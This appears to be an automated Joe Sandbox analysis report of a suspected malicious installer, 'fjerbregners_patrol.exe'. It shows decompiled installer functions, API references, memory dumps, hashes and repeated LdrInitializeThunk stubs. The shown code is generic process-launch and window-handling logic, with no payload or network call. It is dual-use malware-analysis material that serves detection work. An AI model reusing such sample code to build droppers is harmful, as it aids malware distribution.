                                                                                                                                                                                            • Instruction Fuzzy Hash: CCF058702041109FC7048BC8D859EBB73E9FF86300F25C9AAF85D8B304C770AC068B96
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00405755 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                            			E00405755(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t8;
				int _t11;
				int _t15;
				long _t16;

				_t16 = _a16;
				_t15 = _a8;
				_t8 = _t15;
				if(_t15 != 0x102) {
					__eflags = _t15 - 0x200;
					if(_t15 != 0x200) {
						__eflags = _t8 - 0x419;
						if(_t8 != 0x419) {
							L9:
							return CallWindowProcA( *0x4205fc, _a4, _t15, _a12, _t16);
						}
						L7:
						__eflags =  *0x420e00 - _t16; // 0x0
						if(__eflags != 0) {
							_push(_t16);
							_push(6);
							 *0x420e00 = _t16;
							E004053A5();
						}
						goto L9;
					}
					_t11 = IsWindowVisible(_a4);
					__eflags = _t11;
					if(_t11 == 0) {
						goto L9;
					}
					_t16 = E0040555F(_a4, "true");
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L9;
				}
				E004053D7(0x413);
				return 0;
			}







                                                                                                                                                                                            0x00405759
                                                                                                                                                                                            0x0040575d
                                                                                                                                                                                            0x00405760
                                                                                                                                                                                            0x00405768
                                                                                                                                                                                            0x0040577e
                                                                                                                                                                                            0x00405784
                                                                                                                                                                                            0x004057a6
                                                                                                                                                                                            0x004057ab
                                                                                                                                                                                            0x004057c3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004057d1
                                                                                                                                                                                            0x004057ad
                                                                                                                                                                                            0x004057ad
                                                                                                                                                                                            0x004057b3
                                                                                                                                                                                            0x004057b5
                                                                                                                                                                                            0x004057b6
                                                                                                                                                                                            0x004057b8
                                                                                                                                                                                            0x004057be
                                                                                                                                                                                            0x004057be
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004057b3
                                                                                                                                                                                            0x00405789
                                                                                                                                                                                            0x0040578f
                                                                                                                                                                                            0x00405791
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040579d
                                                                                                                                                                                            0x0040579f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040579f
                                                                                                                                                                                            0x0040576e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405775
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00405789
                                                                                                                                                                                            • CallWindowProcA.USER32(?,?,?,?), ref: 004057D1
                                                                                                                                                                                              • Part of subcall function 004053D7: SendMessageA.USER32(000303F6,00000000,00000000,00000000), ref: 004053E9
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                                            • Opcode ID: 6efc313562472d72834e77595f2de3d9467625bea255858f426669e247b00b6a
                                                                                                                                                                                            • Instruction ID: 5bc3962a49d10b2450a163e0c37d2fa738e87bb558bee3b2fade7f9b9c3e30ba
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6efc313562472d72834e77595f2de3d9467625bea255858f426669e247b00b6a
                                                                                                                                                                                            • Instruction Fuzzy Hash: F5014431600608EBDF305F55EC44E9B3A66EB44760F14443BF904B71D1C7B98992AEA9
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004056E9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32comCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 44%
                                                                                                                                                                                            			E004056E9(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x424028;
				_t10 =  *0x42402c;
				__imp__OleInitialize(0);
				 *0x424060 =  *0x424060 | __eax;
				E004053D7(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					do {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) == 0) {
							goto L4;
						} else {
							_push(_v0);
							if(E00401399( *_t12) != 0) {
								 *0x4240cc =  *0x4240cc + 1;
							} else {
								goto L4;
							}
						}
						goto L7;
						L4:
						_t12 = _t12 + 0x418;
					} while (_t10 != 0);
				}
				L7:
				E004053D7(0x404);
				__imp__OleUninitialize();
				return  *0x4240cc;
			}







                                                                                                                                                                                            0x004056ea
                                                                                                                                                                                            0x004056f1
                                                                                                                                                                                            0x004056f9
                                                                                                                                                                                            0x004056ff
                                                                                                                                                                                            0x00405707
                                                                                                                                                                                            0x0040570e
                                                                                                                                                                                            0x00405710
                                                                                                                                                                                            0x00405713
                                                                                                                                                                                            0x00405713
                                                                                                                                                                                            0x00405718
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040571a
                                                                                                                                                                                            0x0040571a
                                                                                                                                                                                            0x00405727
                                                                                                                                                                                            0x00405735
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405727
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405729
                                                                                                                                                                                            0x00405729
                                                                                                                                                                                            0x0040572f
                                                                                                                                                                                            0x00405733
                                                                                                                                                                                            0x0040573b
                                                                                                                                                                                            0x00405740
                                                                                                                                                                                            0x00405745
                                                                                                                                                                                            0x00405752

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004056F9
                                                                                                                                                                                              • Part of subcall function 004053D7: SendMessageA.USER32(000303F6,00000000,00000000,00000000), ref: 004053E9
                                                                                                                                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 00405745
                                                                                                                                                                                              • Part of subcall function 00401399: MulDiv.KERNEL32(00000025,00007530,00000000), ref: 004013F9
                                                                                                                                                                                              • Part of subcall function 00401399: SendMessageA.USER32(?,00000402,00000000), ref: 00401409
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • Apteres Setup: Installing, xrefs: 004056E9
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MessageSend$InitializeUninitialize
                                                                                                                                                                                            • String ID: Apteres Setup: Installing
                                                                                                                                                                                            • API String ID: 1011633862-650456579
                                                                                                                                                                                            • Opcode ID: 72288bf4e3f690a13b7f59859cff4ae185cc3a17749997c21d5ba5b6b871db05
                                                                                                                                                                                            • Instruction ID: 1f051d566987bc9835bfe14526c65a763a3304abebb709bb6e43f4a874f66421
                                                                                                                                                                                            • Opcode Fuzzy Hash: 72288bf4e3f690a13b7f59859cff4ae185cc3a17749997c21d5ba5b6b871db05
                                                                                                                                                                                            • Instruction Fuzzy Hash: 70F09076604901CAD3219794ED01B577360EBC4351F15403EEF48B32E0DBB588829E6C
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004064BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E004064BA(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x421610->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x421610,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                                                                                            0x004064c0
                                                                                                                                                                                            0x004064e3
                                                                                                                                                                                            0x004064eb
                                                                                                                                                                                            0x004064f0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004064f6
                                                                                                                                                                                            0x004064fa

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421610,?,?,?,916,?), ref: 004064E3
                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,916,?), ref: 004064F0
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • "C:\Users\user\Desktop\fjerbregners_patrol.exe", xrefs: 004064BA
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                            • String ID: "C:\Users\user\Desktop\fjerbregners_patrol.exe"
                                                                                                                                                                                            • API String ID: 3712363035-3012761959
                                                                                                                                                                                            • Opcode ID: bf02c7bb9f7bb8e187f8019f64a4957dfc41f02e59a9df9ccb6b2d09937bd5ca
                                                                                                                                                                                            • Instruction ID: 81759c4dcdf7eceef64ae938a5524a507ece6a18c376b7729ff2a99a56b35d32
                                                                                                                                                                                            • Opcode Fuzzy Hash: bf02c7bb9f7bb8e187f8019f64a4957dfc41f02e59a9df9ccb6b2d09937bd5ca
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AE04FB06002097FEB009F60ED05F7F766CEB10244F404439BD10F7160D7B498118AAC
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:0%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                            Signature Coverage:25%
                                                                                                                                                                                            Total number of Nodes:4
                                                                                                                                                                                            Total number of Limit Nodes:1
                                                                                                                                                                                            execution_graph 46681 33d329f0 LdrInitializeThunk 46688 33d32b2a 46689 33d32b31 46688->46689 46690 33d32b3f LdrInitializeThunk 46688->46690

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 33D34260 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: 14b8a5e4ac3ad2a25850e557ca29cc3f7972aa1c6f00f8af5f11c74460baad51
                                                                                                                                                                                            • Instruction ID: a7d94919eaeec4d825e31b44422cf0226dedff6d0d4c4a0c6f88bc82b485b6c2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 14b8a5e4ac3ad2a25850e557ca29cc3f7972aa1c6f00f8af5f11c74460baad51
                                                                                                                                                                                            • Instruction Fuzzy Hash: E690023164540412954075589984546400557E0342B51C416E0414524CCE25895A6361
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D334E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 16 33d334e0-33d334ec LdrInitializeThunk
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: 23c64c63fe2cb028580e48c9f1280a6ad27f9f730539eb98c09a82a62c89fd53
                                                                                                                                                                                            • Instruction ID: 320fd7b5446bd6cdbd09b985ca4c117645f854eda0a3f46113928170e52ad4ec
                                                                                                                                                                                            • Opcode Fuzzy Hash: 23c64c63fe2cb028580e48c9f1280a6ad27f9f730539eb98c09a82a62c89fd53
                                                                                                                                                                                            • Instruction Fuzzy Hash: BA90023164510802D50075589614706100547D0242F61C816A0414538DCBA6895576A2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D32BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 7 33d32bc0-33d32bcc LdrInitializeThunk
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: f3613d43cf7b6669842c4a9b251ab7da54957b0ea550cc3d9eebe1a660ff8315
                                                                                                                                                                                            • Instruction ID: 72289649649808a22d3320dfe0058722f01cb41d362786c031e53741be6de284
                                                                                                                                                                                            • Opcode Fuzzy Hash: f3613d43cf7b6669842c4a9b251ab7da54957b0ea550cc3d9eebe1a660ff8315
                                                                                                                                                                                            • Instruction Fuzzy Hash: AC90023124100802D5007998A508646000547E0342F51D416A5014525ECA7688957231
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D32B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 6 33d32b90-33d32b9c LdrInitializeThunk
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: 07a32489818e91f860eb27eee50ece4dd9c0f363a2e0d60d621bf6af6975b507
                                                                                                                                                                                            • Instruction ID: f2761d55006db135b9bc291d027d1fdf2df9b23cbd65442dd0beb702e987ebb1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 07a32489818e91f860eb27eee50ece4dd9c0f363a2e0d60d621bf6af6975b507
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7190023124108C02D5107558D50474A000547D0342F55C816A4414628DCAA688957221
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D32B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 5 33d32b10-33d32b1c LdrInitializeThunk
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: 9ceb150959c366518e6a24c78498e978dfb8ac025d833a07d5f0057ea9c0e6df
                                                                                                                                                                                            • Instruction ID: dc46bce1572d1d3cd5280b65692642ad83a74b494b3d0cf89619166d1e73e476
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ceb150959c366518e6a24c78498e978dfb8ac025d833a07d5f0057ea9c0e6df
                                                                                                                                                                                            • Instruction Fuzzy Hash: FC90023124100C02D5807558950464A000547D1342F91C41AA0015624DCE268A5D77A1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D329F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 4 33d329f0-33d329fc LdrInitializeThunk
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: b7c0b46718ce859086ee69bc7606b4a0000f5a41e3274726a9b43c90040ff559
                                                                                                                                                                                            • Instruction ID: b900b1a30560da24ddeaad0024962313f0217be97721239e01afbf8037916b49
                                                                                                                                                                                            • Opcode Fuzzy Hash: b7c0b46718ce859086ee69bc7606b4a0000f5a41e3274726a9b43c90040ff559
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B900225251004030505B9585704507004647D5392351C426F1005520CDA3288656221
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D338D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 17 33d338d0-33d338dc LdrInitializeThunk
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: f2d2b9214132df8a2ba63e139671ecbaeae2669c973ea204e1a1bfcad0588978
                                                                                                                                                                                            • Instruction ID: fae7b01a60eee312413b390c37947626cf3a115fbcde3b4b8fac4960b1532f6f
                                                                                                                                                                                            • Opcode Fuzzy Hash: f2d2b9214132df8a2ba63e139671ecbaeae2669c973ea204e1a1bfcad0588978
                                                                                                                                                                                            • Instruction Fuzzy Hash: A090022128505502D550755C9504616400567E0242F51C426A0804564DC96688597321
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D32F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 15 33d32f00-33d32f0c LdrInitializeThunk
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: 13941dea9f74253bd589ef526a20b997aecd250f85da5a4e94aacb6a55d2c5fd
                                                                                                                                                                                            • Instruction ID: ebfd975e123c11baac82bd1c12b3e182f1493b793fe3972ab697d1e4bf41254b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 13941dea9f74253bd589ef526a20b997aecd250f85da5a4e94aacb6a55d2c5fd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0990022125180442D60079689D14B07000547D0343F51C51AA0144524CCD2688656621
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D32EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 14 33d32eb0-33d32ebc LdrInitializeThunk
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: a240854acae2f5883ae205f26aabb364040dc0bca91175fd702fbe0853832e4c
                                                                                                                                                                                            • Instruction ID: d48e98209bb47270a3093bf1beab11620b46c9635a784fbd6ce3e727e62242b0
                                                                                                                                                                                            • Opcode Fuzzy Hash: a240854acae2f5883ae205f26aabb364040dc0bca91175fd702fbe0853832e4c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F90023124140802D5007558991470B000547D0343F51C416A1154525DCA3688557671
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D32E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 13 33d32e50-33d32e5c LdrInitializeThunk
                                                                                                                                                                                            APIs
